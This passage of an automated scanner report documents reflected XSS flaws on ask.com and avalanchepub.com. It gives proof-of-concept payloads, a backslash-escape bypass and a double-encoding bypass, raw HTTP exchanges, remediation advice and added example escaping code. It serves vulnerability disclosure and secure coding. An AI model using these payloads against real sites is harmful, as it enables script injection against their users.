var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=5FE0A0EC710BBBF7BFB5CE57623B5A62&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88aec4a3
alert(1)//34861841eee
';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=p&lodid=us";


...[SNIP]...

2.139. http://www.ask.com/pictures [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd16d\'%3b4e4b316f914 was submitted in the q parameter. This input was echoed as cd16d\\';4e4b316f914 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes, before any quotation marks are escaped.
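Findings 2.137 through 2.139 are three outcomes of the same template pattern: the l parameter is dropped into a single-quoted string with no escaping at all, the q parameter gets its quotes backslashed but not its backslashes, and a raw newline inside the string ends whatever rest-of-line comment the earlier injection opened. Note also that the response stores the same unescaped l value in the user and puser cookies (see the Set-Cookie lines above), and later requests in this report send it back, so the injected string is replayed on subsequent page loads rather than only on the one response. The following is an added example, not code from the XSS.CX report or from ask.com: a model of the server-side template with the three escaping strategies side by side, rendered and executed with alert() replaced by a recorder so the effect of each payload can be observed. The function names, the var l template and the recorder are this example's own assumptions; the payloads are the ones quoted in the findings, except that the second alert in the newline payload is numbered 2 so the recorder can tell the two apart.

```javascript
// Added example (not code from the XSS.CX report or from ask.com): a server
// template that embeds a request parameter in a single-quoted JavaScript
// string literal, with the three escaping strategies seen in the findings.

// 1. No escaping: what the l parameter received on /pictures.
function escapeNone(s) {
  return s;
}

// 2. Quote-only escaping: what the q parameter received. A backslash already
//    in the input is not doubled, so the attacker's backslash consumes the one
//    the application inserts and the quote still terminates the string.
function escapeQuoteOnly(s) {
  return s.replace(/'/g, "\\'");
}

// 3. Backslash first, then quotes, then line terminators (a raw newline is
//    illegal inside a string literal and ends a // comment) and the characters
//    that could close the surrounding <script> block or start a comment.
function escapeJsString(s) {
  return s
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/"/g, '\\"')
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029")
    .replace(/</g, "\\x3c")
    .replace(/>/g, "\\x3e")
    .replace(/\//g, "\\/");
}

// Builds `var l = '<escaped value>'; return l;` the way the template would,
// parses it, then runs it with alert() replaced by a recorder. The result says
// whether the page still parses, whether attacker code ran, and what the
// variable finally held.
function render(value, escaper) {
  const script = "var l = '" + escaper(value) + "'; return l;";
  const alerts = [];
  let fn;
  try {
    fn = new Function("alert", script);      // parse only; throws SyntaxError
  } catch (e) {
    return { script, status: "syntax-error", alerts, value: undefined };
  }
  try {
    const result = fn(function (x) { alerts.push(String(x)); });
    return { script, status: "ran", alerts, value: result };
  } catch (e) {
    return { script, status: "runtime-error:" + e.name, alerts, value: undefined };
  }
}

// Payloads as quoted in findings 2.137 to 2.139 (second alert renumbered to 2).
const PAYLOAD_QUOTE_BREAK = "29fdb';alert(1)//4d917efb5f3";
const PAYLOAD_BACKSLASH = "cd16d\\';4e4b316f914";
const PAYLOAD_NEWLINE = "dir5fb41';alert(1)//d1f92dec88aec4a3\nalert(2)//34861841eee";
// The manual probe carried in the path and cookies throughout this report.
const PAYLOAD_UPPERCASE = "dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88a";
```

With escapeNone, PAYLOAD_QUOTE_BREAK runs alert(1) and the page's own return l is swallowed by the // comment; with escapeQuoteOnly, PAYLOAD_BACKSLASH produces var l = 'cd16d\\';4e4b316f914'; which terminates the string and then fails to parse, exactly the "string terminated, no full proof of concept" result the scanner reports for q; with escapeJsString both payloads round-trip into the variable unchanged and nothing executes. The newline payload shows why the line-terminator replacements matter: unescaped, the raw newline ends the first comment and alert(2) runs on the next line. The uppercase DOCUMENT.COOKIES probe parses but throws a ReferenceError, since JavaScript is case-sensitive and the property is document.cookie; only the scanner's alert(1) probes are actually confirmed here.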

Request

GET /pictures?q=Ohiocd16d\'%3b4e4b316f914&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88a&qsrc=3015 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:00:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:00:41 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88a"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAwOjQxLVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28DOCUMENT.COOKIES%29%2F%2Fd1f92dec88a; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:41 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:41 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 52634


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
ecieved= '';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'Ohiocd16d\\';4e4b316f914';
google_kw = 'Ohiocd16d\\';4e4b316f914';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute('fSecondCa
...[SNIP]...

2.140. http://www.ask.com/pictureslanding [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb41'%3balert(1)//d1f92dec88a was submitted in the l parameter. This input was echoed as 5fb41';alert(1)//d1f92dec88a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note also that the response writes the submitted value into the user and puser cookies (see the Set-Cookie headers below), so the payload is carried on later requests to the domain; the report does not show whether it is re-echoed from the cookie.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictureslanding?o=0&l=dir5fb41'%3balert(1)//d1f92dec88a HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:57:00 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir5fb41';alert(1)//d1f92dec88a"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU3OjAwLVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%281%29%2F%2Fd1f92dec88a; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 45895


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<title>Im
...[SNIP]...



var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=CE733406B7019A88A2CE1DFC35FAC6DE&qsrc=121&dm=all&qrt=2&lid=&o=0&l=dir5fb41';alert(1)//d1f92dec88a';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=ph&lodid=us";


...[SNIP]...

2.141. http://www.ask.com/pictureslanding [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68661\'%3bad7a82f13fb was submitted in the q parameter. This input was echoed as 68661\\';ad7a82f13fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be handled before (or in the same pass as) the quotation marks; escaping quotes first and backslashes afterwards, or not at all, is exactly what allows an attacker-supplied backslash to neutralise the one the application adds.
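The bypass described in issues 2.141 and 2.142, and the remediation it calls for, as an added example (this is not code from the report or from ask.com). A naive escaper that backslashes only the quotation mark, which is the behaviour the responses show, sits beside a single-pass escaper for single-quoted JavaScript string literals. The rendered script is evaluated with new Function so the effect is observable under Node.js; the payload is constructed with the same shape as the report's but sets a flag instead of calling alert, and the google_kw assignment is the template taken from the response. The function names are assumptions made for the example.

```javascript
// Added example (not from the report): escaping untrusted data into a
// single-quoted JavaScript string literal. Runs under Node.js.

// Constructed payload with the same shape as the report's 68661\';...//,
// but the injected statement sets a flag instead of calling alert().
const ATTACKER_INPUT = "68661\\';globalThis.pwned=1//ad7a82f13fb";

// The behaviour the report observed: quotes get a backslash, backslashes do not.
function naiveEscape(s) {
  return String(s).replace(/'/g, "\\'");
}

// Hardened escaper: every character that can alter the parse is replaced in a
// single pass, so a backslash the escaper emits is never re-processed. '<' is
// escaped as well so the data can never close the enclosing <script> element.
const ESCAPES = {
  "\\": "\\\\", "'": "\\'", '"': '\\"',
  "<": "\\x3c", ">": "\\x3e", "&": "\\x26",
  "\n": "\\n", "\r": "\\r", "\u2028": "\\u2028", "\u2029": "\\u2029",
};
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<>&\n\r\u2028\u2029]/g, (c) => ESCAPES[c]);
}

// The template from the response: google_kw = '<data>';
function renderScript(escaper, data) {
  return "var google_kw = '" + escaper(data) + "';\nreturn google_kw;";
}

// Parse and run the rendered script the way a browser would, and report
// whether the attacker's statement executed (it would set globalThis.pwned).
function evaluate(escaper, data) {
  delete globalThis.pwned;
  let value;
  let error;
  try {
    value = new Function(renderScript(escaper, data))();
  } catch (e) {
    error = e.name;
  }
  return { value, error, injected: globalThis.pwned === 1 };
}

console.log("naive   :", evaluate(naiveEscape, ATTACKER_INPUT));
console.log("hardened:", evaluate(jsStringEscape, ATTACKER_INPUT));
```

With the naive escaper the rendered literal becomes '68661\\' followed by the attacker's statement, so the string ends after the escaped backslash and the flag is set; with the single-pass escaper the literal round-trips to the original input and nothing else runs. Using one regular expression with a lookup table, rather than chained replace calls, is what makes the ordering problem impossible.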

Request

GET /pictureslanding?q=68661\'%3bad7a82f13fb&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 17:57:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:57:37 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir5fb41; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjU3OjM3LVVUQw%3D%3D&po=0&pp=dir5fb41; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:57:37 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:57:37 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 60166


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<title>Im
...[SNIP]...
ds_recieved= '';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = '68661\\';ad7a82f13fb';
google_kw = '68661\\';ad7a82f13fb';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute('fSecondCall',
...[SNIP]...

2.142. http://www.ask.com/web [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f84\'%3ba552257ac42 was submitted in the q parameter. This input was echoed as 41f84\\';a552257ac42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /web?q=What+causes+brain+freeze%3F41f84\'%3ba552257ac42&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 16:59:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:59:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..|V2hhdCtjYXVzZXMrYnJhaW4rZnJlZXplJTNGNDFmODQlNUMlMjclM0JhNTUyMjU3YWM0Mg..; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU5OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:26 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 80820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - What's Yo
...[SNIP]...
google_safe = 'medium';
google_adtest = 'off';

google_ad_section = 'default';

google_page_url = '';


google_hints = 'What causes brain freeze?41f84\\';a552257ac42';
google_kw = '';


google_kw_type = 'broad';

}else{

google_ad_client = 'aj-cat';
google_ad_channel = 'health-diseases';
googl
...[SNIP]...

2.143. http://www.ask.com/web [qid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 558cb'%3balert(1)//ec1d53be65e was submitted in the qid parameter. This input was echoed as 558cb';alert(1)//ec1d53be65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=los+angeles+it+consulting&qsrc=0&frstpgo=0&o=0&l=dir&qid=38FDBEE5438F532FB16A69B271896D79558cb'%3balert(1)//ec1d53be65e&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:09:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:09:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjA5OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:09:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:09:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 122746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - What's Yo
...[SNIP]...
<script type="text/javascript">
var _psBack = '&#171;&#160;Prev';
var _psForward = 'Next&#160;&#187;';
var _psQueryID = '38FDBEE5438F532FB16A69B271896D79558cb';alert(1)//ec1d53be65e';
var _psQuerySource = '0';
var _psSiteID = '';
</script>
...[SNIP]...

2.144. http://www.avalanchepub.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.avalanchepub.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f00b'style='x:expression(alert(1))'d02eb00d6bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers: IE8 and later disable CSS expressions in standards mode, although the response below carries no DOCTYPE, so IE renders the page in quirks mode, where expressions remain enabled. The underlying defect, an unescaped single quote reflected into a single-quoted attribute value, does not depend on the browser.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
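The decode-order problem described above, as an added example (this is not code from the report or from the site): a reconstruction of the vulnerable pattern, in which the parameter name is validated after the web server's single decode but then decoded a second time before being reflected into the single-quoted referer attribute, beside a hardened handler that performs no second decode and encodes for the attribute context on output. The payloads are the report's; the blocklist, the handler names and the markup skeleton are assumptions made for the example. Runs under Node.js.

```javascript
// Added example (not from the report): validation before a second URL-decode.

// Payloads from the report. The first is percent-encoded once, the second twice.
const SINGLE_ENCODED = "2f00b%27style%3d%27x%3aexpression%28alert%281%29%29%27d02eb00d6bf";
const DOUBLE_ENCODED = "2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf";

// What the web server does before the application sees the parameter name:
// exactly one percent-decode.
function serverDecode(name) {
  return decodeURIComponent(name);
}

// Assumed blocklist: the characters an attribute-context XSS filter typically rejects.
const BLOCKED = /['"<>]/;

// Reconstruction of the vulnerable pattern: validate, then canonicalise again,
// then reflect with no output encoding. Returns null when the filter rejects.
function vulnerableReferer(nameFromServer) {
  if (BLOCKED.test(nameFromServer)) return null;          // "%27" passes the check...
  const canonical = decodeURIComponent(nameFromServer);   // ...and becomes "'" here
  return "<input type='hidden' name='referer' value='/?" + canonical + "=1'>";
}

// Hardened: trust the server's single decode, and encode for the HTML attribute
// context on output whatever validation did or did not do.
function attrEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function hardenedReferer(nameFromServer) {
  return "<input type='hidden' name='referer' value='/?" + attrEncode(nameFromServer) + "=1'>";
}

// Check: does the reflected value contain a raw quote that closes the attribute?
function attributeBreakout(html) {
  const m = /value='(.*)'>$/.exec(html);
  return m !== null && m[1].includes("'");
}

console.log("vulnerable, single-encoded:", vulnerableReferer(serverDecode(SINGLE_ENCODED)));
console.log("vulnerable, double-encoded:", vulnerableReferer(serverDecode(DOUBLE_ENCODED)));
console.log("hardened,   double-encoded:", hardenedReferer(serverDecode(DOUBLE_ENCODED)));
console.log("hardened,   single-encoded:", hardenedReferer(serverDecode(SINGLE_ENCODED)));
```

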